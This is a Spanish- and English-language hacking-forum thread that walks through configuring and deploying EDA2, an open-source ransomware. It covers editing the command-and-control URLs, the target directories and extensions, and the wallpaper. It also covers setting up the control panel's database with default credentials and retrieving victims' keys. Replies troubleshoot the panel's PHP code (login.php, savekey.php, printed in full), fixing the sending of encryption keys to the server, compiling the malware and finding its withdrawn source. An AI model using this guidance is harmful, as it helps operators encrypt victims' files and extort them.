Configurando EDA2

Iniciado por blackdrake, Diciembre 11, 2015, 03:14:59 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Diciembre 11, 2015, 03:14:59 PM Ultima modificación: Mayo 20, 2016, 04:17:08 PM por blackdrake

Hola a todos, a petición de varios usuarios (@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y un usuario que envió un email), he realizado un tutorial básico y rápido de como configurar EDA2.

EDA2, es la versión actualizada de Hidden Tears, podéis obtener más información en estos post:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Repositorio oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mirror (by @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Al igual que Hidden Tears, EDA2 es un ransomware opensource con las siguientes características:


  • Utiliza ambos algoritmos RSA y AES.
  • Se coordina desde un C&C
  • Utiliza CSPRNG y phplibsec
  • Los archivos cifrados se pueden descifrar con el software de la versión anterior.
  • Cambia el fondo de escritorio al ejecutarse.

Funcionamiento

1. El ransomware envía una solicitud POST al C&C con la variable del nombre de usuario.
2. El C&C crea la key RSA pública /privada y envía la clave pública para al ransomware y guarda la clave privada en la base de datos
3. El programa crea una clave aleatoria para el algoritmo AES
4. El ransomware encripta los archivos con el algoritmo AES
5. El ransomware encripta la clave AES con la clave pública RSA y la envía al C&C vía POST  NO FUNCIONA A mi no me funcionó y tuve que reprogramarlo para el tutorial (más bien hice una chapuza rápida). Parece ser que envía los campos en blanco.
6. El C&C guarda la clave cifrada AES dentro de la base de datos. NO FUNCIONA  Al no recibir nada, no lo guarda.

Configuración

1. Lo primero con lo que nos encontramos, es la siguiente linea:


Desde esta, podremos modificar la longitud de la clave RSA.

2. Acto seguido, deberemos modificar estas 2 urls por las de nuestro hosting (habiendo subido previamente el panel).


En la siguiente línea podremos modificar la imagen que se pondrá de fondo de escritorio al ejecutar el ransomware:


3. Podremos modificar el directorio desde donde empezará a cifrar los ficheros en esta linea:


4. Además, como en Hidden Tears, podremos modificar la extensión de nuestros ficheros cifrados.


5. Obviamente, podremos decidir que extensiones queremos cifrar, pudiendo añadir o eliminar de la lista que viene por defecto.


6. Además, podemos modificar el algoritmo de creación de la clave, pudiendo poner una por defecto si queremos.


Nota: EDA2 utiliza .NET Framework 4.5, podremos modificar la versión desde aquí:

7. Una vez tengamos el ransomware modificado, debemos crear la tabla dummy en una base de datos llamada panel (obviamente estos nombres se pueden modificar desde el código php, pero son los que vienen por defecto).:


8. Ahora deberemos crear los siguientes campos en nuestra tabla:


Nota: No es necesario darles ese "tipo" de campo, requiere mucho menos espacio.

9. Una vez hecho esto, podremos logearnos en el panel de administración, cuya url sería No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, utilizando las credenciales por defecto, test:test


10. Este será el dashboard de nuestro panel, donde veremos la información de los infectados.


11.  Verificamos que nuestros ficheros no están cifrados (pues no hemos ejecutado aún el ransomware).


12. Ejecutamos EDA2 y veremos como cambia nuestro fondo de pantalla (por el que hemos seleccionado antes) y nuestros ficheros están cifrados. 


13. Accedemos al panel de administración para obtener la clave para descifrar los ficheros.


14. Pulsamos sobre el botón que dice "Decipher" (Descifrar) y obtendremos la clave necesaria para hacerlo.


15. Utilizamos la clave en el software y listo!


Saludos!
Blackdrake



Hello.

Can you tell me how you get AES Key? I have blank.  :(

Thank you!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hello.

Can you tell me how you get AES Key? I have blank.  :(

Thank you!

The software automatically generates, you just have to edit the php file that gets for storage in your bd.

Regards.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hello.

Can you tell me how you get AES Key? I have blank.  :(

Thank you!

The software automatically generates, you just have to edit the php file that gets for storage in your bd.

Regards.

Which php file need to edit? I work like on tutorial ... my AES key is only blank.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Which php file need to edit? I work like on tutorial ... my AES key is only blank.

As I put in paragraph 5 and 6, the AES key is not sent.

5. El ransomware encripta la clave AES con la clave pública RSA y la envía al C&C vía POST  NO FUNCIONA A mi no me funcionó y tuve que reprogramarlo para el tutorial (más bien hice una chapuza rápida). Parece ser que envía los campos en blanco.

6. El C&C guarda la clave cifrada AES dentro de la base de datos. NO FUNCIONA  Al no recibir nada, no lo guarda.

Basically what I did was edit the php code (savekey.php) to store the AES key in a txt hosted on my server then I stored the data in the db.

You can also edit the code in C # to store otherwise

Regards.



Hello, i got a problem trying to login into webpanel for EDA2 hidden tear online webpanel.
I configured the database and everything correctly, but each time i try to login, it shows the below respone.:


string(4) "test" string(4) "test"
Fatal error: Call to undefined function password_verify() in /home/bialvmlq/public_html/panel/login.php on line 14

Although, i have made several installation of EDA webpanel on 2 different hosts, but still gives same response.

Help please to resolve this issue.
will be appreciated

can you put the code from this file  /home/bialvmlq/public_html/panel/login.php maybe something is wrong in the file
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Diciembre 18, 2015, 04:28:19 PM #7 Ultima modificación: Diciembre 23, 2015, 03:43:26 PM por blackdrake
here is the code in login.php:
------------
Código: php
<?php

session_start();

//Username:test
//Password:test

if(!empty($_POST)) {
$isim = $_POST['login'];
$sifre = $_POST['password'];

var_dump($isim, $sifre);

if($isim == 'test' && password_verify($sifre, '$2y$10$ZzV6jDI5HU.SUrpx0AFoQe9r49NI.NkpH5OhZ28Ug4G0MnmdVKaFy')) {
$_SESSION['auth'] = 1;
   
    header('Location: main.php');
    exit;
}
}

?>

<!DOCTYPE html>
<!--[if lt IE 7]> <html class="lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
<!--[if IE 7]> <html class="lt-ie9 lt-ie8" lang="en"> <![endif]-->
<!--[if IE 8]> <html class="lt-ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title></title>
  <style type="text/css">
  .about,.login h1{text-align:center}.about a,.about a:hover,.login-help a{text-decoration:none}a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}.about{margin:70px auto 40px;padding:8px;width:260px;font:10px/18px 'Lucida Grande',Arial,sans-serif;color:#666;text-shadow:0 1px rgba(255,255,255,.25);background:#eee;background:rgba(250,250,250,.8);border-radius:4px;background-image:-webkit-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.1));background-image:-moz-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.1));background-image:-o-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.1));background-image:linear-gradient(to bottom,rgba(0,0,0,0),rgba(0,0,0,.1));-webkit-box-shadow:inset 0 1px rgba(255,255,255,.3),inset 0 0 0 1px rgba(255,255,255,.1),0 0 6px rgba(0,0,0,.2);box-shadow:inset 0 1px rgba(255,255,255,.3),inset 0 0 0 1px rgba(255,255,255,.1),0 0 6px rgba(0,0,0,.2)}.about a{color:#333;border-radius:2px;-webkit-transition:background .1s;-moz-transition:background .1s;-o-transition:background .1s;transition:background .1s}.about a:hover{background:#fafafa;background:rgba(255,255,255,.7)}.about-links{height:30px}.about-links>a{float:left;width:50%;line-height:30px;font-size:12px}.about-author{margin-top:5px}.about-author>a{padding:1px 3px;margin:0 -1px}body{font:13px/20px 'Lucida Grande',Tahoma,Verdana,sans-serif;color:#404040;background:#0ca3d2}.container{margin:80px auto;width:640px}.login{position:relative;margin:0 auto;padding:20px;width:310px;background:#fff;border-radius:3px;-webkit-box-shadow:0 0 200px rgba(255,255,255,.5),0 1px 2px rgba(0,0,0,.3);box-shadow:0 0 200px rgba(255,255,255,.5),0 1px 2px rgba(0,0,0,.3)}.login:before{content:'';position:absolute;top:-8px;right:-8px;bottom:-8px;left:-8px;z-index:-1;background:rgba(0,0,0,.08);border-radius:4px}.login h1{margin:-20px -20px 21px;line-height:40px;font-size:15px;font-weight:700;color:#555;text-shadow:0 1px #fff;background:#f3f3f3;border-bottom:1px solid #cfcfcf;border-radius:3px 3px 0 0;background-image:-webkit-linear-gradient(top,whiteffd,#eef2f5);background-image:-moz-linear-gradient(top,whiteffd,#eef2f5);background-image:-o-linear-gradient(top,whiteffd,#eef2f5);background-image:linear-gradient(to bottom,whiteffd,#eef2f5);-webkit-box-shadow:0 1px #f5f5f5;box-shadow:0 1px #f5f5f5}.login p{margin:20px 0 0}.login p:first-child{margin-top:0}.login input[type=password],.login input[type=text]{width:278px}.login p.remember_me{float:left;line-height:31px}.login p.remember_me label{font-size:12px;color:#777;cursor:pointer}.login p.remember_me input{position:relative;bottom:1px;margin-right:4px;vertical-align:middle}.login p.submit{text-align:right}.login-help{margin:20px 0;font-size:11px;color:#fff;text-align:center;text-shadow:0 1px #2a85a1}.login-help a{color:#cce7fa}.login-help a:hover{text-decoration:underline}:-moz-placeholder{color:#c9c9c9!important;font-size:13px}::-webkit-input-placeholder{color:#ccc;font-size:13px}input{font-family:'Lucida Grande',Tahoma,Verdana,sans-serif;font-size:14px}input[type=password],input[type=text]{margin:5px;padding:0 10px;width:200px;height:34px;color:#404040;background:#fff;border:1px solid;border-color:#c4c4c4 #d1d1d1 #d4d4d4;border-radius:2px;outline:#eff4f7 solid 5px;-moz-outline-radius:3px;-webkit-box-shadow:inset 0 1px 3px rgba(0,0,0,.12);box-shadow:inset 0 1px 3px rgba(0,0,0,.12)}input[type=password]:focus,input[type=text]:focus{border-color:#7dc9e2;outline-color:#dceefc;outline-offset:0}input[type=submit]{padding:0 18px;height:29px;font-size:12px;font-weight:700;color:#527881;text-shadow:0 1px #e3f1f1;background:#cde5ef;border:1px solid;border-color:#b4ccce #b3c0c8 #9eb9c2;border-radius:16px;outline:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;background-image:-webkit-linear-gradient(top,#edf5f8,#cde5ef);background-image:-moz-linear-gradient(top,#edf5f8,#cde5ef);background-image:-o-linear-gradient(top,#edf5f8,#cde5ef);background-image:linear-gradient(to bottom,#edf5f8,#cde5ef);-webkit-box-shadow:inset 0 1px #fff,0 1px 2px rgba(0,0,0,.15);box-shadow:inset 0 1px #fff,0 1px 2px rgba(0,0,0,.15)}input[type=submit]:active{background:#cde5ef;border-color:#9eb9c2 #b3c0c8 #b4ccce;-webkit-box-shadow:inset 0 0 3px rgba(0,0,0,.2);box-shadow:inset 0 0 3px rgba(0,0,0,.2)}.lt-ie9 input[type=password],.lt-ie9 input[type=text]{line-height:34px}
  </style>
  <!--[if lt IE 9]><script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
</head>
<body>
  <section class="container">
    <div class="login">
      <h1>Login</h1>
      <form method="post" action="">
        <p><input type="text" name="login" value="" placeholder="Username"></p>
        <p><input type="password" name="password" value="" placeholder="Password"></p>
        <p class="submit"><input type="submit" name="commit" value="Login"></p>
      </form>
    </div>
</section>
</body>
</html>

SOLVED !!
password_verify()  Requires PHP version 5.5.0
When you update the PHP version in your servers settings (PHP Version  settings), It worked.

Thanks all

Diciembre 18, 2015, 08:25:17 PM #9 Ultima modificación: Diciembre 23, 2015, 03:43:51 PM por blackdrake
Kindly Specify, what should be edited in the below savekey.php file.
Kindly specify the right code.


---------------------------------------

Código: php
<?php
if(!isset($_POST) || empty($_POST['pcname'])) {
exit;
}
$pcname = $_POST['pcname'];
include 'db.php';
$statement = $connection->prepare("select id from dummy where pcname = ?");
$statement->execute([$pcname]);
$id = $statement->fetch(PDO::FETCH_COLUMN);
if(!$id) {
exit;
}
$aesencrypted = $_POST['aesencrypted'];
$stmt = $connection->prepare('UPDATE dummy SET aesencrypted = ? WHERE id = ?');
$stmt->execute([
$aesencrypted,
$id
]);

------------------------

Check if you get the AES key in that file (save it for example an txt).

I don't remember if I modified the php code or the C # code to send him otherwise. (I think both)

I was made a lot of changes because the code wasn't working.

PD: I remove the code.

Regards.



Diciembre 30, 2015, 07:30:29 AM #11 Ultima modificación: Diciembre 30, 2015, 07:33:53 AM por Visa
Hola.
Cómo elaborar un proyecto en Visual Studio 15?
Crear una compilación de vídeo eda2
Gracias.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola.
Cómo elaborar un proyecto en Visual Studio 15?
Crear una compilación de vídeo eda2
Gracias.

No entiendo tu pregunta, cual es tu problema? no importa que utilices Visual Studio 15, se puede compilar igual :D

Saludos.



Lanzamiento del proyecto.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hay un vídeo para crear un proyecto?

Diciembre 30, 2015, 09:04:14 AM #14 Ultima modificación: Diciembre 30, 2015, 09:31:55 AM por blackdrake
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lanzamiento del proyecto.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hay un vídeo para crear un proyecto?

Prueba cambiando el .net framework, como dije antes:

Citar
Nota: EDA2 utiliza .NET Framework 4.5, podremos modificar la versión desde aquí:





Saludos.



En realidad creo que no es por la version de compilacion de framework.

De la Imagen que muestra el error, lo unico que entiendo es el (404).....xD, aqui tienes mas informacion al respecto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Es un error del tipo System.Net.WebException, en este caso, es posible que la dirección url  hacia el panel que pusiste en la configuracion no sea correcta, revisa eso.
Mas alla de eso, como recomendacion personal, es mejor que aprendas a  programar y tambien que conozcas como funciona un malware de este tipo,  ya que el proyecto en si no tiene control de errores, por lo cual llegaria a producir varios errores en tiempo de ejecución bajo ciertas circunstancias.



BLACKDRAKE,FUDMARIO
Gracias por su respuesta!!!
FUDMARIO, Tenías razón!

Muy Buenas, el EDA2 ya non existe en github, hay por ai outro repositorio do codigo fuente ?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy Buenas, el EDA2 ya non existe en github, hay por ai outro repositorio do codigo fuente ?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

"This project is abandoned. If you are a researcher and want the code, contact me with your university or company e-mail No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"

Sorry.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy Buenas, el EDA2 ya non existe en github, hay por ai outro repositorio do codigo fuente ?

si quieres el codigo fuente, aqui lo tienes: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta